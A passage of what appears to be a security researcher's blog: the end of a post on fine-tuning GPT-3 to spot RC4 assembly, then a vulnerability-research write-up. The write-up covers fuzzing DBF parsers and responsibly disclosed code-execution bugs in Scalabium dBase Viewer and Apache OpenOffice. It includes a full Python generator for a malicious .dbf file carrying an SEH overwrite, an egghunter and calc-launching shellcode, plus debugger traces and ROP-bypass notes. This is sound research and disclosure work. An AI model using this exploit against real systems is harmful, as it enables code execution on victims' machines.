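    state = rc4_ksa(key)
    i = j = 0
    out = bytearray()
    for byte in data:
        i = (i + 1) % 256
        j = (j + state[i]) % 256
        state[i], state[j] = state[j], state[i]
        out.append(byte ^ state[(state[i] + state[j]) % 256])
    return bytes(out)
```

The two tight loops over 256 entries with a swap in the body are the "shape" that tends to stand out in a disassembly graph.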

Would it be possible to tap on a key strength of machine learning – pattern recognition – to automate this process? While classification models are used extensively by antivirus engines nowadays, would it be possible to jerry-rig the GPT-3 language model for assembly?

Right off the bat, GPT-3 by itself is terrible at interpreting assembly. Take the same RC4 example and ask GPT-3 to explain what it is:

GPT-3 vs Assembly Example 1

GPT-3's first answer is that the assembly code prints “HELLO WORLD”. While this demonstrates that GPT-3 understood the prompt, the answer was way off base.

How about changing the prompt instead? This time, I asked GPT-3 to translate the assembly code to Python:

GPT-3 vs Assembly Example 2

Still not great. It seemed like the model was not sufficiently optimized for assembly code. Fortunately, OpenAI also just released a beta fine-tuning feature that allows users to fine-tune GPT-3 (up to the Curie model) on training completions. The training file is in JSONL format and looks like this:

{"prompt": "<prompt text>", "completion": "<ideal generated text>"}
{"prompt": "<prompt text>", "completion": "<ideal generated text>"}
{"prompt": "<prompt text>", "completion": "<ideal generated text>"}

More importantly, it's free to fine-tune models up to 10 fine-tuning runs per month; data sets are limited to 2.5 million tokens (about 80-100 MB). Interestingly, even though GPT-3 really started out as a completion API, OpenAI suggests that fine-tuning could be used to transform the model into classifiers, giving the example of email filters. By setting the auto-completion tokens to 1 (i.e., only return 1 word in the completion), the “completion” now functions as a classification (e.g. returning “spam” or “junk”).

Thus began my very unscientific experiment. I generated a training corpus of 100 windows/shell/reverse_tcp_rc4 payloads with Metasploit, disassembled them with objdump, and cleaned the output with sed. For my unencrypted corpus, I used windows/shell/reverse_tcp. Since Metasploit slightly varies each payload per iteration (I also randomized the RC4 key), there was at least some difference among the samples.
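The exact sed expressions are not shown here, so the following is only a guess at what the cleaning step might look like, written in Python. It assumes the usual objdump listing layout of `address:<TAB>hex bytes<TAB>instruction` and keeps just the instruction text; `clean_objdump` is a hypothetical helper name.

```python
def clean_objdump(listing: str) -> str:
    """Keep only the mnemonic and operands from an objdump listing.

    Assumes instruction lines look like "<addr>:\t<hex bytes>\t<instruction>".
    Headers, blank lines and byte-continuation lines are dropped.
    """
    instructions = []
    for line in listing.splitlines():
        fields = line.split("\t")
        if len(fields) < 3 or not fields[0].strip().endswith(":"):
            continue
        # Collapse the padding objdump inserts between mnemonic and operands.
        instructions.append(" ".join(fields[2].split()))
    return "\n".join(instructions)
```

Stripping addresses and raw bytes this way reduces the token count per sample, which matters given the data set size limit mentioned above.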

Training Set

I then placed the assembly as the prompt in each training sample and set the completion value to either rc4 or unencrypted. Next step: training – openai api fine_tunes.create -t training_samples.jsonl -m curie --no_packing.
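As a rough illustration of that step, the sketch below turns labelled assembly listings into the JSONL layout shown earlier. The helper name `to_jsonl` and the sample listings are made up; only the `prompt` and `completion` keys come from the format above.

```python
import json


def to_jsonl(samples) -> str:
    """Serialise (assembly_text, label) pairs, one JSON object per line."""
    lines = []
    for assembly, label in samples:
        lines.append(json.dumps({"prompt": assembly, "completion": label}))
    return "\n".join(lines) + ("\n" if lines else "")


if __name__ == "__main__":
    # Hypothetical, heavily truncated listings purely for demonstration.
    demo = [
        ("cld\ncall 0x88\npusha", "rc4"),
        ("cld\ncall 0x82\npusha", "unencrypted"),
    ]
    with open("training_samples.jsonl", "w", encoding="utf-8") as handle:
        handle.write(to_jsonl(demo))
```

Using `json.dumps` rather than string formatting means newlines and quotes inside the assembly are escaped correctly, so each sample stays on a single line.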

Fine Tuning

Here, I discovered one major advantage of the API – whereas fine-tuning GPT-2 takes significant time and computing power for hobbyists, fine-tuning GPT-3 via the API took about five minutes on OpenAI's powerful servers. And it's free, too! For now.

With my fine-tuned model in hand, I validated it against a tiny test set scraped from the web. I took custom RC4 assembly by different authors for my test set, such as rc4-cipher-in-assembly. For the unencrypted test set, I simply used non-encryption related assembly code.

The unscientific results (put away your pitchforks) were encouraging:

Experiment Results

RC4 was recognized 4 out of 5 times, while unencrypted samples were recognized 3 out of 5 times. Interestingly, the “wrong” results for unencrypted test samples weren't due to miscategorizing them as rc4. Instead, the fine-tuned model simply returned unrelated tokens such as new tab characters. This was likely because my training set for unencrypted assembly was purely Metasploit shells, while the test set was more varied, including custom code to pop calculator and so on. If one were to take these results as false negatives instead of false positives, the picture looks even better. Of course, the results varied with each iteration, but they remained consistently correct.

Code Review

Since I didn't have access to the Codex beta yet, I used davinci-instruct as the next-best-option to perform code review. I fed it simple samples of vulnerable code and it performed reasonably well.

PHP Code Review

In this sample, it correctly identified the XSS vulnerability, even specifying the exact parameter that caused the vulnerability.

It's also important to note that Codex explicitly cites error-checking of code as a use case. With a bit of tweaking, it's not too much of a stretch to say that it could also perform vulnerability-checking. The only limitation here would be performance over large prompts or codebases. However, for small cases (whitebox CTFs or DOM XSS?), we might see decent results soon.

Furthermore, even though fine-tuning is limited up to the Curie model for now, if OpenAI opens up Codex or Davinci for fine-tuning, the performance gains would be incredible.

Blind Alleys

With a few simple experiments, I found that OpenAI's GPT-3 could be further fine-tuned for specific use cases by cybersecurity researchers. However, there are clear limits to GPT-3's effectiveness. As a language model at heart, it's better suited to tasks like completion and following instructions, and I doubt it would be as good at cryptanalysis or fuzzing – there's no free lunch. There are better classes of ML models for different tasks – or maybe ML isn't even useful in some cases.

The flip side of using AI as a cybersecurity research tool is that those tools can also be compromised – the machine learning variant of a supply-chain attack. Data sources like GitHub can be poisoned to produce vulnerable code, or even leak secrets. I think the use of GitHub code as a training dataset, even for open-source licenses, will remain a sticking point for some.

However, it's clear to me that even if the low-hanging fruit have been plucked, there are still unusual and potentially powerful use-cases for machine learning models in cybersecurity. As access to GPT-3 grows over time, I expect interesting AI-powered security tooling to emerge. For example, IDA recently released a cloud-based Decompiler; while machine learning hasn't come into the equation, it could be an interesting experiment. How about a security hackathon, OpenAI? Let's see how far this rabbit hole goes.

All Your (d)Base Are Belong To Us, Part 1: Code Execution in Apache OpenOffice (CVE-2021-33035)

29 September 2021 at 03:35

Note: This is a mirror of the Medium blogpost.

Introduction

Venturing out into the wilderness of vulnerability research can be a daunting task. Coming from a background in primarily web and application security, I had to shift my hacking mindset towards memory corruption vulnerabilities and local attack vectors. This two-part series will share how I got started in vulnerability research by discovering and exploiting code execution zero-days in office applications used by hundreds of millions of people. I will outline my approach to getting started in vulnerability research including dumb fuzzing, coverage-guided fuzzing, reverse engineering, and source code review. I will also discuss some management aspects of vulnerability research such as CVE assignment and responsible disclosure.

In part two, I will disclose additional vulnerabilities that I discovered via coverage-guided fuzzing – including CVE-2021-38646: Microsoft Office Access Connectivity Engine Remote Code Execution Vulnerability.

Picking a Target

One piece of advice I received early in the vulnerability research journey was to focus on a file format, not a specific piece of software. There are three main advantages to this approach. Firstly, as a beginner, I lacked the experience to quickly identify unique attack vectors in individual applications, whereas file format parsing tends to be a common entrypoint among many applications. Secondly, common file formats are well-documented by Request for Comments (RFCs) or open-source code, reducing the amount of effort required to reverse-engineer the format. Lastly, file format fuzzing tends to be much simpler to set up than protocol fuzzing. Overall, it is a good way to get started in vulnerability research.

However, not all file formats are created equal. I needed to select a file format that was not simply a ZIP file in disguise (e.g. a DOCX file). This simplified my fuzzing templates, since I did not have to deal with nested file containers, and reduced the complexity of root cause analysis. As far as possible, I also wanted to focus on a less-researched file format that may have escaped the notice of other researchers.

After a bit of Googling, I found the dBase database file (DBF) format (.dbf).

Created almost 40 years ago, the dBase database format was used as a data storage mechanism for a variety of applications, from spreadsheet processors to integrated development environments (IDEs). Although it continued to support more use cases with each revision, the format still suffered from significant limitations in storage and media support, eventually losing out to more advanced competitors. However, due to its status as a legacy file format across multiple platforms, dBase databases still popped up in interesting places, such as in the shapefile geographic information system (GIS) format. Many spreadsheet and office applications have continued to support DBF, including Microsoft Office, LibreOffice, and Apache OpenOffice.

Fortunately, it was relatively simple to discover the file format documentation for dBase; Wikipedia has a simple description of version 5 of the format and dBase LLC also provides an updated specification. The Library of Congress lists an amazing catalogue of file formats, including DBF. The various versions and extensions of the DBF format provide ample opportunities for programmers to introduce parsing vulnerabilities.

Dumb Fuzzing with GitLab's Peach Fuzzer

Before diving into coverage-guided fuzzing (which I will write about in part 2), I decided to validate my understanding of the file format by using a format-based dumb fuzzer to discover vulnerabilities in simple DBF processors. FileInfo.com provided a list of programs that could open DBF files. I focused on tiny applications whose sole job was to open and display DBF files rather than complex enterprise applications. This had a few advantages. Firstly, it would be much faster to fuzz with dumb fuzzers, which run the entire application rather than a minimal harness. Secondly, there was a greater likelihood that these less well-maintained applications would be vulnerable to format-based exploits. Lastly, this allowed me to isolate any crashes to the file format parsing logic itself. For my research, I fuzzed Windows applications due to the relative abundance of Windows DBF processors.

I used GitLab's open-source Peach Fuzzer – something I previously wrote about – as my dumb fuzzer. Peach Fuzzer claims to be “smart” due to the way it records and analyses crashes as they occur. However, compared to modern coverage-based fuzzers that trace the execution flow with each iteration, Peach Fuzzer only instruments execution (via Intel PIN) in its corpus minimisation tool. During the actual fuzzing itself, Peach mutates test cases based on given templates, also known as “Pits”.

Crafting the Peach Pit for the DBF format proved to be the most difficult and time-consuming stage of dumb fuzzing. The DBF format consists of two main sections: the header and the body. The header includes a prefix that describes the dBase database version, the last update timestamp, and other metadata. More importantly, it specifies the length of each record in the database, the length of the header structure, the number of records, and the data fields in a record. The fields themselves can be integers, strings, floating numbers, or any other supported data types. The fields also include a FieldLength descriptor. The body simply contains all the records as described by the header.
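To make the layout concrete, here is a minimal Python sketch that parses the header fields described above. The offsets mirror the payload generator later in this post (a 32-byte header followed by 32-byte field descriptors and a 0x0D terminator); other DBF versions and extensions differ, and `parse_dbf_header` is a hypothetical helper, not part of any library.

```python
import struct

# version, last-update date, record count, header length, record length, reserved
HEADER = struct.Struct("<B3sIHH20x")
# field name, field type, (4-byte address skipped), field length, (15 bytes skipped)
FIELD = struct.Struct("<11sc4xB15x")


def parse_dbf_header(data: bytes) -> dict:
    """Parse the fixed header and the field descriptors that follow it."""
    version, date, num_records, header_len, record_len = HEADER.unpack_from(data, 0)
    fields = []
    offset = HEADER.size
    # Field descriptors run until the 0x0D terminator byte.
    while offset < len(data) and data[offset] != 0x0D:
        name, ftype, flen = FIELD.unpack_from(data, offset)
        fields.append({
            "name": name.rstrip(b"\x00").decode("ascii", "replace"),
            "type": ftype.decode("ascii", "replace"),
            "length": flen,
        })
        offset += FIELD.size
    return {
        "version": version,
        "last_update": tuple(date),
        "num_records": num_records,
        "header_length": header_len,
        "record_length": record_len,
        "fields": fields,
    }
```

Note that the parser reads the declared lengths without trusting them for anything, which is exactly the discipline the vulnerable applications in this post lacked.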

To describe the relationship between the number of records specified in the header and the number of actual records in the body, I used the Relation block. For example, I specified the NumberOfRecords header bytes as such:

<Number name="NumberOfRecords" size="32" signed="false">
    <Relation type="count" of="Records" />
</Number>

Later in the template, I added a <Block name="Records" minOccurs="0"> block in the body. Peach automatically detected this relation and ensured that in subsequent mutations, the number of Records blocks in the fuzzing candidate matched the NumberOfRecords value in the header (unless the mutation was intended to break it).

One consideration I struggled with was how strict the templates should be. For example, since Peach supports various data types such as String and Number, I could have also specified that the record data in the body should correspond to the FieldType descriptions in the header. However, this might have prevented the fuzzer from discovering interesting new crashes, such as if a String type was provided for an Integer field. Ultimately, I decided to keep this flexible with a generic <Blob name="RecordData" /> block.

With my Peach Pit complete, it was time to gather a corpus of samples to generate new fuzzing candidates. I wrote a simple Python script to scrape samples using the filetype:dbf Google dork, triaged the samples, and then minimised the corpus with Peach's own tool: .\PeachMinset.exe -s samples -m minset -t traces "<PATH TO FUZZING TARGET>" %s. This cut the corpus size down from more than 200 to about 20.
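How PeachMinset picks its samples internally is not covered here. A common way to think about corpus minimisation, though, is as a greedy set cover over coverage traces: keep picking the sample that covers the most not-yet-covered code until nothing new is gained. The sketch below illustrates that idea only; the trace format (a set of block identifiers per sample) and the function name are assumptions.

```python
def minimise_corpus(traces: dict) -> list:
    """Greedy set cover.

    traces maps a sample name to the set of code blocks it exercised.
    Returns a subset of sample names that covers the same blocks.
    """
    remaining = set().union(*traces.values())
    chosen = []
    while remaining:
        # Pick the sample contributing the most uncovered blocks.
        best = max(traces, key=lambda name: len(traces[name] & remaining))
        gained = traces[best] & remaining
        if not gained:
            break
        chosen.append(best)
        remaining -= gained
    return chosen
```

Greedy selection does not guarantee the smallest possible set, but it is cheap and usually good enough to shrink a scraped corpus by an order of magnitude.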

After all that work, I could finally begin fuzzing! This was as simple as Z:\peach\Peach.exe .\dbf_pit.xml. Some of the applications held up well; for others, the crashes piled up quickly.

Peach Crashes

Peach Fuzzer runs WinDBG's !exploitable script on crashes to triage them. Here, we see that Scalabium dBase Viewer suffered from a structured exception handler (SEH) overwrite crash from one of the test cases.

SEH Crash

Since SEH overwrites are one of the easiest to exploit in Windows (if there are no pesky protections in the way), Peach rightly categorised it as EXPLOITABLE. Additionally, Peach listed which fields it mutated for this test case.

The next step was to pinpoint exactly which bytes caused the SEH overwrite in the test case. I opened the test case in 010 Editor with a DBF template that highlighted which bytes corresponded to the format's specification and manually whittled away excess bytes until I had a “minimal viable crash” file that reproduced the same crash.

Minimal Viable Crash

On the left, you can see the original crash was 18538 bytes, while on the right the minimal viable crash file was only 102 bytes. By removing excess bytes in blocks while ensuring that the crash was still reproducible, I eventually isolated the root cause of the crash: the field with fieldType of 2!
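I did this whittling by hand, but the same idea can be sketched as a simple greedy loop in Python. Everything here is illustrative: `still_crashes` is a hypothetical callback that would write the candidate to disk, open it in the target under a debugger, and report whether the same crash occurred.

```python
def minimise_crash(data: bytes, still_crashes, block_size: int = 1024) -> bytes:
    """Greedily delete blocks, keeping a deletion only if the crash reproduces."""
    while block_size >= 1:
        offset = 0
        while offset < len(data):
            candidate = data[:offset] + data[offset + block_size:]
            if candidate and still_crashes(candidate):
                data = candidate      # deletion kept; retry at the same offset
            else:
                offset += block_size  # this block is needed; move on
        block_size //= 2              # retry with finer-grained deletions
    return data
```

In a length-prefixed format like DBF, blindly deleting bytes shifts later fields and can change which crash is triggered, so a format-aware template (as in 010 Editor) is still useful for deciding which blocks are safe to remove.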

Going back to the DBF documentation, the fieldType byte defines the data type of the corresponding field in the record, such as C for character, D for date, L for logical, and so on. However, 2 was not mentioned. After further research, I came across the documentation for the FlagShip extension to the dBase database format that included a 2 data type:

fieldType | Size | Type | Description/Storage | Applies for (supported by)
2 | 2 | short int | binary int max +/– 32767 | FS (.dbf type = 0x23,0x33,0xB3)
4 | 4 | long int | binary int max +/– 2147483647 | FS (.dbf type = 0x23,0x33,0xB3)
8 | 8 | double | binary signed double IEEE | FS (.dbf type = 0x23,0x33,0xB3)

This suggested that the overflow occurred due to an overly large buffer being copied into the short int buffer of size 2. I decided to further inspect the crash in WinDBG:

(173c.21c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify checksum for C:\Users\offsec\Desktop\exploits\dbfview\dbfview\dbfview.exe
eax=001979d0 ebx=41414141 ecx=00000000 edx=41414141 esi=00000000 edi=02214628
eip=0046619c esp=00197974 ebp=0019faa4 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
dbfview+0x6619c:
0046619c 8b4358          mov     eax,dword ptr [ebx+58h] ds:002b:41414199=????????
0:000> !exchain
0019798c: dbfview+6650f (0046650f)
0019faac: 42424242
Invalid exception stack at 41414141
0:000> dd 0019faac-0x20
0019fa8c  00000000 41414141 41414141 41414141
0019fa9c  41414141 41414141 41414141 41414141
0019faac  41414141 42424242 0019fb40 0019fb48
0019fabc  004676e7 0019fb40 004c1c10 00000002
0019facc  02214628 00000000 02214744 00000000
0019fadc  00000000 0019fb48 004082ef 02214744
0019faec  80000000 00000003 00000000 00000003
0019fafc  00000080 00000000 4c505845 0054494f

I observed that my controlled buffer of size 36 (as specified in fieldLength in the 010 Editor template) had been copied byte for byte into the short int buffer which led to the SEH overwrite. This suggested that the application blindly trusted the attacker-controlled fieldLength when performing a copy of the bytes into a pre-allocated buffer whose size was determined by the attacker-controlled fieldType. This resulted in a straightforward buffer overflow with no special character requirements. Before proceeding with the exploitation, I performed one final check with narly for any memory protections:

0:000> !nmod
00400000 0051e000 dbfview              /SafeSEH OFF                C:\Users\offsec\Desktop\exploits\dbfview\dbfview\dbfview.exe

Great, dbfview had no protections. I proceeded to write a short script to generate my proof-of-concept payload.

from struct import pack

# SEH-based egghunter with egg w00tw00t
egghunter = b"\xeb\x2a\x59\xb8\x77\x30\x30\x74\x51\x6a\xff\x31\xdb\x64\x89\x23\x83\xe9\x04\x83\xc3\x04\x64\x89\x0b\x6a\x02\x59\x89\xdf\xf3\xaf\x75\x07\xff\xe7\x66\x81\xcb\xff\x0f\x43\xeb\xed\xe8\xd1\xff\xff\xff\x6a\x0c\x59\x8b\x04\x0c\xb1\xb8\x83\x04\x08\x06\x58\x83\xc4\x10\x50\x31\xc0\xc3"                       

# dbase header
payload = b'\x03'                       # dbase version number
payload += b'\x01\x01\x01'              # last update date
payload += pack('<i', 1)                # number of records
payload += pack('<h', 65)               # length of header structure (32 + 32 + 1)
payload += pack('<h', 4095)             # length of each record
payload += 20 * b'\x00'                 # reserved bytes

# field definition
payload += pack('11s', b'EXPLOIT')      # field name
payload += b'2'                         # field type (short integer)
payload += 4 * b'\x00'                  # field data address (can be null)
payload += pack('B', 255)               # field size (change accordingly)
payload += 15 * b'\x00'                 # reserved bytes
payload += b'\x0D'                      # terminator character

# record definition
payload += b'\x20'                      # deleted flag
payload += 28 * b'\x90'                 # offset
# payload += 4 * b'\x41'                # offset
payload += pack("<L", (0x909006eb))     # JMP 06
payload += pack("<L", (0x00457886))     # dbfview: pop edi; pop esi; ret
payload +=  egghunter                      
payload += b'w00tw00t'                  # egg

# msfvenom -p windows/exec CMD=calc -f python -v payload
payload += b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64"
payload += b"\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28"
payload += b"\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c"
payload += b"\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52"
payload += b"\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
payload += b"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49"
payload += b"\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01"
payload += b"\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75"
payload += b"\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b"
payload += b"\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
payload += b"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a"
payload += b"\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00"
payload += b"\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5"
payload += b"\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c"
payload += b"\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a"
payload += b"\x00\x53\xff\xd5\x63\x61\x6c\x63\x00"

with open('payload.dbf', 'wb') as w:
    w.write(payload)

I opened the generated file in dbfview.exe, and popped Calc. Great!

POC Video

Source Code Review of Apache OpenOffice

Now that I had validated my dumb fuzzing template on a few smaller DBF processors, it was time to aim higher. The dumb fuzzing stage taught me that the DBF file format suffers from an inherent weakness: the buffer size of a record can be determined either by the fieldLength or the fieldType in the header. If a programmer blindly trusts one of them when allocating a buffer, but uses the other to determine the size of a copy into that buffer, this can lead to a buffer overflow.
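One way to express this weakness as a check is to flag any field whose declared length is larger than the fixed size implied by its type. The sketch below does that in Python using the FlagShip sizes from the table earlier; the function name and the tuple layout are made up for illustration, and the size table would need extending for other fixed-width types.

```python
# Fixed storage sizes implied by the FlagShip binary field types.
FIXED_SIZES = {"2": 2, "4": 4, "8": 8}


def oversized_fields(fields, fixed_sizes=FIXED_SIZES):
    """Return fields whose declared length exceeds their type's fixed size.

    fields is an iterable of (name, field_type, field_length) tuples.
    Variable-width types (not in fixed_sizes) are ignored.
    """
    return [
        (name, ftype, length)
        for name, ftype, length in fields
        if ftype in fixed_sizes and length > fixed_sizes[ftype]
    ]
```

A parser that ran a check like this before copying record data would have rejected the crashing file, since its short int field declared far more than 2 bytes.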

As some open-source projects like Apache OpenOffice support DBF files, I decided to perform a source code review for this vulnerability. Not long after, I hit the jackpot on OpenOffice's DBF parsing code:

        else if ( DataType::INTEGER == nType )
        {
            sal_Int32 nValue = 0;
			memcpy(&nValue, pData, nLen);
            *(_rRow->get())[i] = nValue;
        }

Here, we can see a buffer nValue of size sal_Int32 (4 bytes) being instantiated for a field of type INTEGER. Next, memcpy copies a buffer of size nLen – which is an attacker-controlled value – into nValue without validating that nLen is smaller than or equal to 4. This pattern was repeated across various data types. Could this be a variation of the previous buffer overflow? I quickly modified my previous payload generator to the integer field type (I), increased the size of fieldLength to greater than sal_Int32, and opened the file in OpenOffice Calc. I got my crash!

Unfortunately, things weren't so easy this time round. Although the initial crash resulted in an SEH overwrite, the SEH chain refused to execute. The soffice binary itself had Safe Exception Handlers (SAFESEH) protections on, along with address space layout randomization (ASLR) and Data Execution Prevention (DEP), which prevented simple exploitation of the overflow.

Tracing back from the initial exception, I realised that it was triggered by some kind of validation check earlier in the execution flow:

0:000> p
eax=08ceacec ebx=0ffe68e8 ecx=08ceacf0 edx=00000001 esi=0ff38d60 edi=084299b9
eip=08c56920 esp=0178dd58 ebp=0178de74 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
dbase+0x16920:
08c56920 e862c6feff      call    dbase+0x2f87 (08c42f87)
0:000> u dbase+0x2f87 L12
dbase+0x2f87:
08c42f87 55              push    ebp
08c42f88 8bec            mov     ebp,esp
08c42f8a 56              push    esi
08c42f8b 8bf1            mov     esi,ecx
08c42f8d 8b4610          mov     eax,dword ptr [esi+10h]
08c42f90 2b460c          sub     eax,dword ptr [esi+0Ch]
08c42f93 57              push    edi
08c42f94 8b7d08          mov     edi,dword ptr [ebp+8]
08c42f97 c1f802          sar     eax,2
08c42f9a 3bf8            cmp     edi,eax
08c42f9c 7206            jb      dbase+0x2fa4 (08c42fa4)
08c42f9e ff1588b0c608    call    dword ptr [dbase!GetVersionInfo+0x9176 (08c6b088)]
08c42fa4 8b460c          mov     eax,dword ptr [esi+0Ch]
08c42fa7 8d04b8          lea     eax,[eax+edi*4]
08c42faa 5f              pop     edi
08c42fab 5e              pop     esi
08c42fac 5d              pop     ebp
08c42fad c20400          ret     4

Since the exception was triggered if the cmp edi,eax check failed, I performed dynamic analysis to determine the offset in my payload that was being evaluated, and set it to 00000001 to pass the check. This time, a different exception occurred – an invalid instruction exception.
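For readers less used to x86, here is my reading of that routine restated as a few lines of Python. It looks like a bounds-checked lookup into an array of 4-byte elements: the element count is (end - begin) / 4, and the requested index must be below it. The names are invented, and raising `IndexError` merely stands in for the imported handler called at 08c42f9e, whose identity is not shown in the listing.

```python
def checked_element_address(begin: int, end: int, index: int) -> int:
    """Mimic the check: element count = (end - begin) >> 2, index must be below it."""
    count = (end - begin) >> 2            # sub eax,[esi+0Ch] ; sar eax,2
    if not (index & 0xFFFFFFFF) < count:  # cmp edi,eax ; jb (unsigned compare)
        raise IndexError("index out of range")  # stand-in for the call at 08c42f9e
    return begin + index * 4              # lea eax,[eax+edi*4]
```

With the overflow clobbering the value used as the index, the comparison fails unless that part of the payload holds a small, valid index.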

This was a good sign that I had overwritten a return pointer on the stack and could thus control the execution flow again, which I confirmed in WinDBG. However, I still needed to get a DEP and ASLR bypass to start my return-oriented programming chain. Once again, I checked the protections of the loaded modules with narly:

0:011> !nmod
00110000 00b9c000 soffice              /SafeSEH ON  /GS *ASLR *DEP C:\Program Files\OpenOffice 4\program\soffice.bin
03e20000 04b67000 icudt40              NO_SEH                      C:\Program Files\OpenOffice 4\program\icudt40.dll
4de60000 4df58000 libxml2              /SafeSEH ON  /GS            C:\Program Files\OpenOffice 4\program\libxml2.dll
50040000 50097000 scui                 /SafeSEH ON  /GS *ASLR *DEP C:\Program Files\OpenOffice 4\program\scui.DLL
500a0000 502d3000 sb                   /SafeSEH ON  /GS *ASLR *DEP C:\Program Files\OpenOffice 4\program\sb.dll
50360000 50395000 forui                /SafeSEH ON  /GS *ASLR *DEP C:\Program Files\OpenOffice 4\program\forui.dll
503a0000 503e1000 uui                  /SafeSEH ON  /GS *ASLR *DEP C:\Program Files\OpenOffice 4\program\uui.dll
50470000 504bf000 ucpfile1             /SafeSEH ON  /GS *ASLR *DEP C:\Program Files\OpenOffice 4\program\ucpfile1.dll
504c0000 5053a000 configmgr_uno        /SafeSEH ON  /GS *ASLR *DEP C:\Program Files\OpenOffice 4\program\configmgr.uno.dll

Bingo. Among the various modules, libxml2 was still compiled without any DEP or ASLR protections, allowing me to use it as a source of ROP gadgets. I dumped all possible ROP gadgets with 0vercl0k's rp tool and got to work. I quickly encountered a problem: no matter how I set the fieldLength value, it appeared that the overwritten buffer was limited to about 256 bytes. This precluded a traditional GetModuleHandleA > GetProcAddress > VirtualProtect chain, forcing me to try harder to meet this size limit. I began by trying a few optimizations. I moved my final VirtualProtect skeleton before the ROP chain in the buffer, giving me a little more room for my ROP gadgets. For my stack pivot, I used a hard-coded add esp, 0x0C ; ret ; gadget so that I did not have to dynamically create the offset in my chain. Lastly, for the purposes of the proof-of-concept, I decided to simply load WinExec to pop calc. This reduced the number of function calls I needed.
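When working against a size limit like this, it helps to track the byte budget mechanically rather than by eye. The helper below is a small sketch of that bookkeeping in Python. The default budget of 255 is an assumption, based on fieldLength being a single byte in the earlier generator script, and the values in the usage note are placeholders rather than real gadget addresses.

```python
import struct


def pack_chain(dwords, budget: int = 255):
    """Pack 32-bit little-endian values and report how many bytes are left.

    Raises ValueError if the packed chain would not fit in the budget.
    """
    chain = b"".join(struct.pack("<L", value & 0xFFFFFFFF) for value in dwords)
    if len(chain) > budget:
        raise ValueError(f"chain is {len(chain)} bytes, budget is {budget}")
    return chain, budget - len(chain)
```

For example, `pack_chain([0x41414141, 0x42424242])` packs two placeholder dwords and reports 247 bytes remaining, which makes it easy to see how much each optimization buys back.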

With a bit of elbow grease, I was finally able to get my proof-of-concept to work:

POC Video

With the insights I gathered from simple dumb fuzzing, I managed to find a code execution vulnerability in software that has been downloaded more than 300 million times! This raised the question: why did no one discover this bug earlier? As an open-source program, OpenOffice would undoubtedly have been automatically scanned by various static code analysers, which would have easily picked up the unsafe memcpy.

When I checked OpenOffice's page on https://lgtm.com/, a code analysis platform that runs CodeQL tests on open-source projects, I noticed something interesting:

LGTM OpenOffice

OpenOffice was tagged as a Python and JavaScript project. Since CodeQL requires the scanner to build a database of the relevant source code, CodeQL would have completely missed these vulnerabilities if OpenOffice's C++ code had been excluded while building the database. Browsing the files on LGTM, I noticed that there were no C++ files included. This demonstrates the importance of sanity-checking automated static analysis tools; if your tools don't know the code exists, they can't find those vulnerabilities.

Disclosing the Vulnerabilities

As it was my first foray into vulnerability research, I encountered a bit of a culture shock when it came to disclosure. Unlike web-based bug bounties, where patches are relatively easy to deploy and issues are resolved in a matter of days or weeks, development cycles for native applications, especially widely used ones, can be on the order of months. While Scalabium dBase viewer was run by a single developer and could be resolved almost immediately, Apache OpenOffice took much longer.

Scalabium dBase Viewer (CVE-2021-35297)

  • Jun 7: Initial disclosure
  • Jun 9: Acknowledgement and patch
  • Aug 17: CVE assigned

Apache OpenOffice (CVE-2021-33035)

  • 4 May: Initial disclosure
  • 5 May: Acknowledgement
  • 6 May: Request for disclosure/patch timeline
  • 12 May: 2nd request for disclosure/patch timeline
  • 19 May: 3rd request for disclosure/patch timeline
  • 21 May: Apache request for 30 Aug disclosure date and patch verification; CVE assigned
  • 21 May: Verified patch and agreed to 30 Aug disclosure date
  • 22 Jul: Request to re-confirm 30 Aug disclosure date
  • 26 Jul: Apache re-confirmed 30 Aug disclosure date
  • 28 Aug: Notify about 18 Sep full disclosure
  • 18 Sep: Full disclosure

Apache released new packages that patched this vulnerability and updated the source code on GitHub to perform buffer size checking. For example, the integer type now ensures that nLen equals 4:

        else if ( DataType::INTEGER == nType )
        {
            OSL_ENSURE(nLen == 4, "Invalid length for integer field");
            if (nLen != 4) {
                return false;
            }
            sal_Int32 nValue = 0;
            memcpy(&nValue, pData, nLen);
            *(_rRow->get())[i] = nValue;
        }

Overall, my experience with responsibly disclosing vulnerability research has been extremely varied, depending on the maturity and ability of individual vendors. It was definitely a far cry from the service-level agreement (SLA) timelines I enjoyed on third-party platforms. In some cases, vendors did not have a dedicated security disclosure contact, or listed an inactive email.

Conclusion and Next Steps

As I mentioned in the beginning, this blogpost is part one of a two-part series. Dumb fuzzing and source code reviews can only get you so far, especially when dealing with complex black box applications. In a week or two, I will follow up with part two, where I will disclose additional vulnerabilities I discovered via coverage-guided fuzzing in Microsoft Office and others.

In the meantime, I hope this provides guidance to application security pentesters dipping their toes into vulnerability research. I benefited greatly from expanding my offensive security arsenal and found interesting overlaps in the skills and intuition required for successful vulnerability research.

All Your (d)Base Are Belong To Us, Part 2: Code Execution in Microsoft Office (CVE-2021-38646)

22 October 2021 at 11:43

Note: This is a mirror of the Medium blogpost.

Introduction

